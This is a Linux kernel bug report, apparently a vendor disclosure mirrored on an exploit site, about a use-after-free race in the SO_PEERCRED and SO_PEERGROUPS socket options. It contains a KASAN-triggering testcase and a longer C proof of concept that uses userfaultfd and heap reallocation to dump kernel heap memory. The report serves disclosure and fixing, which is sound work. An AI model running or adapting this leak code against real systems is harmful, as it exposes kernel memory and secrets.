## https://sploitus.com/exploit?id=1337DAY-ID-37059
Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())
# bug description
In sock_getsockopt() (in net/core/sock.c), the handlers for the
socket options SO_PEERCRED (has probably had a data race since forever
that got turned into a UAF read in v2.6.36, commit \"af_unix: Allow
SO_PEERCRED to work across namespaces\") and
SO_PEERGROUPS (introduced in v4.13, commit \"net: introduce SO_PEERGROUPS
getsockopt\") don't use any locking when copying data from
sk->sk_peer_cred to userspace.
This can race with operations that update sk->sk_peer_cred:
- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)
This means that if the creds are replaced and freed at the wrong time, a
use-after-free read occurs.
From what I can tell, the impact on the kernel is limited to data leakage.
Theoretically, it could also lead to an out-of-bounds *write* to
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket
whose ->sk_peer_cred is going away; however, in a normal scenario,
SO_PEERGROUPS would only be called on a socket from accept(), and a
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred
on that socket.
# simple testcase
In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y,
this issue can be demonstrated with the following testcase.
Note that this testcase is using SO_PEERCRED in a weird way: It reads
the \"peer credentials\" of a listening socket, which doesn't really make
any semantic sense. As far as I can tell from reading the code, you
could also trigger the same UAF by racing SO_PEERCRED with repeated
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),
but then the race would get more complicated.
```
// compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\"
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/fsuid.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>
static int s;
static uid_t my_uid;
static gid_t my_gid;
void *ucred_thread(void *dummy) {
while (1) {
struct ucred ucred;
socklen_t optlen = sizeof(ucred);
if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))
perror(\"getsockopt\");
}
}
int main(void) {
my_uid = getuid();
my_gid = getgid();
s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, \"socket\");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = \"/tmp/unix-test-socket\"
};
unlink(bind_addr.sun_path);
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, \"bind\");
pthread_t thread;
if (pthread_create(&thread, NULL, ucred_thread, NULL))
errx(1, \"pthread_create\");
while (1) {
if (listen(s, 16))
perror(\"listen\");
// avoid glibc's automatic thread sync in set*id() wrappers!
// note that setfsuid() doesn't reallocate on no-op request.
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))
err(1, \"setresuid(raw)\");
}
}
```
This results in the following splat:
```
BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619
CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
print_address_description.constprop.0 (mm/kasan/report.c:257)
[...]
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)
[...]
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
[...]
__sys_getsockopt (net/socket.c:2216)
[...]
__x64_sys_getsockopt (net/socket.c:2232)
[...]
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
RIP: 0033:0x7f93cd99a5ca
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48
All code
========
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0
7: f7 d8 neg %eax
9: 64 89 01 mov %eax,%fs:(%rcx)
c: 48 83 c8 ff or $0xffffffffffffffff,%rax
10: c3 ret
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
18: 00 00 00
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
20: 49 89 ca mov %rcx,%r10
23: b8 37 00 00 00 mov $0x37,%eax
28: 0f 05 syscall
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction
30: 73 01 jae 0x33
32: c3 ret
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0
3a: f7 d8 neg %eax
3c: 64 89 01 mov %eax,%fs:(%rcx)
3f: 48 rex.W
Code starting with the faulting instruction
===========================================
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
6: 73 01 jae 0x9
8: c3 ret
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6
10: f7 d8 neg %eax
12: 64 89 01 mov %eax,%fs:(%rcx)
15: 48 rex.W
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000
Allocated by task 618:
kasan_save_stack (mm/kasan/common.c:38)
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)
prepare_creds (kernel/cred.c:262)
__sys_setresuid (kernel/sys.c:666)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
Freed by task 618:
kasan_save_stack (mm/kasan/common.c:38)
kasan_set_track (mm/kasan/common.c:46)
kasan_set_free_info (mm/kasan/generic.c:362)
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)
Last potentially related work creation:
kasan_save_stack (mm/kasan/common.c:38)
kasan_record_aux_stack (mm/kasan/generic.c:348)
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)
unix_listen (net/unix/af_unix.c:648)
__sys_listen (net/socket.c:1727)
__x64_sys_listen (net/socket.c:1734)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
The buggy address belongs to the object at ffff8880355c7c40
which belongs to the cache cred_jar of size 192
The buggy address is located 36 bytes inside of
192-byte region [ffff8880355c7c40, ffff8880355c7d00)
The buggy address belongs to the page:
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0
flags: 0x4000000000010200(slab|head|zone=1)
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
^
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
```
# root-only reproducer for normal systems
The following is a simple reproducer that attempts to use this issue to
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)
from a dangling pointer in groups_to_user().
(Note: There are two functions called groups_to_user(). The relevant one
is in net/core/sock.c.)
This isn't quite a real exploit - it **requires root privileges** to
call setgroups() and, if userfaultfd is restricted, also to trap a kernel
fault with userfaultfd. I expect that you could get around those
limitations with some work though, assuming that the attacker is running
in a normal Linux userspace.
Note that this bug can still be used to dump gigabytes of kernel heap
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the
out-of-bounds read occurs outside of usercopy code:
```
static int groups_to_user(gid_t __user *dst, const struct group_info *src)
{
struct user_namespace *user_ns = current_user_ns();
int i;
for (i = 0; i < src->ngroups; i++)
if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
return -EFAULT;
return 0;
}
```
```
// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread
#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <grp.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <limits.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <linux/membarrier.h>
// kernel sets upper limit: 65536.
// up to 2 pages will be served by slabs, we probably don't want that.
// choose a size between order-3 and order-4 (means needs order-4 page)
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)
#define OUTPUT_MAPPING_LEN 0x400000000
static int s;
static int launch_eventfd;
static unsigned char *output_mapping;
static void *getsockopt_threadfn(void *dummy) {
eventfd_t evval;
if (eventfd_read(launch_eventfd, &evval))
err(1, \"eventfd_read\");
socklen_t optlen = INT_MAX;
if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {
perror(\"getsockopt\");
//system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");
exit(1);
}
return NULL;
}
void dump(char *label) {
printf(\"\
=== DUMP %s ===\
\", label);
system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\");
}
int main(void) {
char dummy_char;
// set up sleep-inducing mapping
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (output_mapping == MAP_FAILED) err(1, \"mmap\");
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))
err(1, \"mprotect\");
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
if (uffd == -1) err(1, \"userfaultfd\");
struct uffdio_api api = {
.api = UFFD_API,
.features = 0
};
if (ioctl(uffd, UFFDIO_API, &api))
err(1, \"UFFDIO_API\");
struct uffdio_register reg = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, ®))
err(1, \"UFFDIO_REGISTER\");
// prepare getsockopt() thread
launch_eventfd = eventfd(0, 0);
if (launch_eventfd == -1) err(1, \"eventfd\");
pthread_t thread;
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))
errx(1, \"pthread_create\");
// set up for reallocation primitive
int realloc_fd = open(\"/proc/self/maps\", O_RDONLY);
if (realloc_fd == -1) err(1, \"open maps\");
char tmpdir[] = \"/tmp/blah.XXXXXX\";
if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\");
if (chdir(tmpdir)) err(1, \"chdir tmpdir\");
char dummy_name[100];
memset(dummy_name, 'A', 99);
dummy_name[99] = '\\0';
char move_target[200];
sprintf(move_target, \"d/%s\", dummy_name);
mkdir(dummy_name, 0700);
char file_path[200];
sprintf(file_path, \"%s/a\", dummy_name);
int path_len = strlen(tmpdir) + strlen(file_path); // approximate
{
int fd = open(file_path, O_CREAT|O_RDWR, 0600);
if (fd == -1) err(1, \"open deep file\");
if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)
err(1, \"mmap deep\");
}
bool half_deep_probed = false;
while (path_len < ALLOC_SIZE) {
mkdir(\"d\", 0700);
if (rename(dummy_name, move_target)) err(1, \"rename\");
if (rename(\"d\", dummy_name)) err(1, \"rename 2\");
path_len += strlen(dummy_name) + 1;
if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {
half_deep_probed = true;
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
err(1, \"read maps half-deep\");
}
}
s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, \"socket\");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = \"/tmp/unix-test-socket\"
};
unlink(bind_addr.sun_path);
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, \"bind\");
pid_t child = fork();
if (child == -1) err(1, \"fork\");
if (child == 0) {
gid_t gid_list[NUM_GROUPS];
gid_t my_gid = getgid();
for (int i=0; i<NUM_GROUPS; i++) {
gid_list[i] = my_gid; // (kernel doesn't deduplicate)
}
dump(\"before setgroups\");
if (setgroups(NUM_GROUPS, gid_list))
err(1, \"setgroups\");
dump(\"after setgroups, expect -1\");
if (listen(s, 16))
err(1, \"listen in child\");
return 0;
}
int status;
if (waitpid(child, &status, 0) != child)
err(1, \"wait\");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, \"child didn't exit cleanly\");
// wildly flailing around in the hope of flushing out the task
// (but not the creds yet)
usleep(400 * 1000);
for (int i=0; i<4; i++)
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);
// launch getsockopt, and wait for it to start
if (eventfd_write(launch_eventfd, 1)) err(1, \"eventfd_write\");
usleep(500 * 1000);
// schedule RCU freeing of the creds
if (listen(s, 16))
err(1, \"listen in parent\");
// wait for RCU (twice to be safe - yes, this is senseless voodoo)
for (int i=0; i<2; i++)
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);
// crappy reallocation attempt, should overwrite length with ASCII
dump(\"pre-reallocation, expect +1\");
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
err(1, \"read maps deep\");
dump(\"post-reallocation, expect -1\");
// resume getsockopt
struct uffdio_zeropage zeropage = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000}
};
if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, \"ZEROPAGE\");
// wait for getsockopt to finish
if (pthread_join(thread, NULL)) err(1, \"pthread_join\");
// dump results
int pagemap_fd = open(\"/proc/self/pagemap\", O_RDONLY);
if (pagemap_fd == -1) err(1, \"open pagemap\");
unsigned long filled_pages = 0;
for (unsigned long addr = (unsigned long)output_mapping;
addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;
addr += 0x1000) {
uint64_t val;
if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))
err(1, \"pagemap read\");
if ((val >> 62) == 0)
break;
filled_pages++;
}
printf(\"got %lu pages\
\", filled_pages);
FILE *hexdump = popen(\"hexdump -C\", \"w\");
if (!hexdump)
err(1, \"popen\");
fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);
pclose(hexdump);
}
```
# disclosure deadline
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2021-12-27.